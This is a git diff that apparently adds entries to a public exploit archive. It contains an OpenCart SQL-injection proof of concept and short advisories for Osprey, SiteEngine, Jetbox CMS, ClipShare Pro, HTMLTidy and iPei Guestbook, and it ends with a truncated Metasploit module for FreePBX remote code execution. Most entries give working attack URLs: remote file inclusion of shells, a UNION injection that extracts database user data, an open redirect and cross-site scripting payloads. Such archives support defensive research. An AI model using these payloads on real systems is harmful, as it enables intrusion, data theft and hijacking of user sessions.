b/platforms/php/webapps/32520.txt 
@@ -0,0 +1,50 @@
+# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
+# Date : 2014/3/26
+# Exploit Author : Saadat Ullah ? saadi_linux@rocketmail.com
+# Software Link : http://www.opencart.com/index.php?route=download/download
+ : https://github.com/opencart
+# Software web : www.opencart.com
+# Author HomePage : http://security-geeks.blogspot.com/
+# Tested on: Server : Apache/2.2.15 PHP/5.3.3
+
+#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
+privilege escalation as attacker may need openbay module access .
+
+Poc
+Poorly coded file full of SQLi opencart/system/library/ebay.php
+In file opencart/system/library/ebay.php
+product_id is used in a SQL query without being sanitize.
+
+public function getEbayItemId($product_id) {
+ $this->log('getEbayItemId() - Product ID: '.$product_id);
+
+ $qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
+..............
+Function is called on many locations and paramter is passed without santize.
+In opencart\admin\controller\openbay\openbay.php
+public function editLoad() {
+ ...
+ $item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
+..............
+Where $this->request->get['product_id'] comming from GET field.
+Similarly More
+
+public function isEbayOrder($id) {
+ ...
+ $qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
+
+In opencart\admin\controller\extension\openbay.php
+ public function ajaxOrderInfo()
+ ...
+ if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
+..............
+More
+public function getProductStockLevel($productId, $sku = '') {
+ ...
+ $qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
+..............
+ebay.php has many more..
+User should have openbay module access
+http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
+
+#Independent Pakistani Security Researcher
\ No newline at end of file
diff --git a/platforms/php/webapps/32521.txt b/platforms/php/webapps/32521.txt
new file mode 100755
index 000000000..f3681451a
--- /dev/null
+++ b/platforms/php/webapps/32521.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31883/info
+
+Osprey is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Osprey 1.0a4.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell]
+http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell]
\ No newline at end of file
diff --git a/platforms/php/webapps/32523.txt b/platforms/php/webapps/32523.txt
new file mode 100755
index 000000000..bd2dc67f1
--- /dev/null
+++ b/platforms/php/webapps/32523.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31888/info
+
+SiteEngine is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing-style attacks.
+
+SiteEngine 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/api.php?action=logout&forward=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/32524.txt b/platforms/php/webapps/32524.txt
new file mode 100755
index 000000000..c4730e37c
--- /dev/null
+++ b/platforms/php/webapps/32524.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31889/info
+
+SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SiteEngine 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32525.txt b/platforms/php/webapps/32525.txt
new file mode 100755
index 000000000..c8dfca3eb
--- /dev/null
+++ b/platforms/php/webapps/32525.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31890/info
+
+Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Jetbox CMS 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/32526.txt b/platforms/php/webapps/32526.txt
new file mode 100755
index 000000000..4603fb5eb
--- /dev/null
+++ b/platforms/php/webapps/32526.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31898/info
+
+ClipShare Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ClipShare Pro 4.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/32527.txt b/platforms/php/webapps/32527.txt
new file mode 100755
index 000000000..aba4e9975
--- /dev/null
+++ b/platforms/php/webapps/32527.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31908/info
+
+Adam Wright HTMLTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+HTMLTidy 0.5 is vulnerable; other versions may also be affected. Products that include HTMLTidy as a component will also be vulnerable.
+
+NOTE: This record was previously titled 'Kayako eSupport html-tidy-logic.php Cross Site Scripting Vulnerability'. It has been updated to properly describe the vulnerability as an HTMLTidy issue.
+
+http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2);
\ No newline at end of file
diff --git a/platforms/php/webapps/32528.txt b/platforms/php/webapps/32528.txt
new file mode 100755
index 000000000..29e483a8b
--- /dev/null
+++ b/platforms/php/webapps/32528.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31911/info
+
+iPei Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/index.php?pg=c0d3_xss
\ No newline at end of file
diff --git a/platforms/php/webapps/9623.txt b/platforms/php/webapps/9623.txt
index 943d05e22..f8c733a01 100755
--- a/platforms/php/webapps/9623.txt
+++ b/platforms/php/webapps/9623.txt
@@ -1,39 +1,39 @@
-======================================================
-
- Advanced comment system1.0 Remote File Inclusion Vulnerability
-
-
-<> Found by : kurdish hackers team
-
-<> C0ntact : pshela [at] YaHoo .com
-
-<> Groups : Kurd-Team
-
-<> site : www.kurdteam.org
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-<<->> script :: Advanced_comment_system_1-0
-
-<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
-
-=======================================================
-+++++++++++++++++++++++ Exploit ++++++++++++++++++++++
-=======================================================
-
-
-<<->> Exploit ::
-
- >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
- /advanced_comment_system/admin.php?ACS_path=[shell.txt?]
-
-
-=======================================================
-
-=======================================================
-
-<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team
-
-# milw0rm.com [2009-09-10]
+======================================================
+
+ Advanced comment system1.0 Remote File Inclusion Vulnerability
+
+
+<> Found by : kurdish hackers team
+
+<> C0ntact : pshela [at] YaHoo .com
+
+<> Groups : Kurd-Team
+
+<> site : www.kurdteam.org
+
+=======================================================
++++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+<<->> script :: Advanced_comment_system_1-0
+
+<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
+
+=======================================================
++++++++++++++++++++++++++ Exploit ++++++++++++++++++++++
+=======================================================
+
+
+<<->> Exploit ::
+
+ >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
+ /advanced_comment_system/admin.php?ACS_path=[shell.txt?]
+
+
+=======================================================
+
+=======================================================
+
+<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team
+
+# milw0rm.com [2009-09-10]
diff --git a/platforms/unix/remote/32512.rb b/platforms/unix/remote/32512.rb
new file mode 100755
index 000000000..566a514c9
--- /dev/null
+++ b/platforms/unix/remote/32512.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "FreePBX config.php Remote Code Execution",
+ 'Description' => %q{
+ This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
+ It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
+ parameters "function" and "args".
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'i-Hmx', # Vulnerability discovery
+ '0x00string', # PoC
+ 'xistence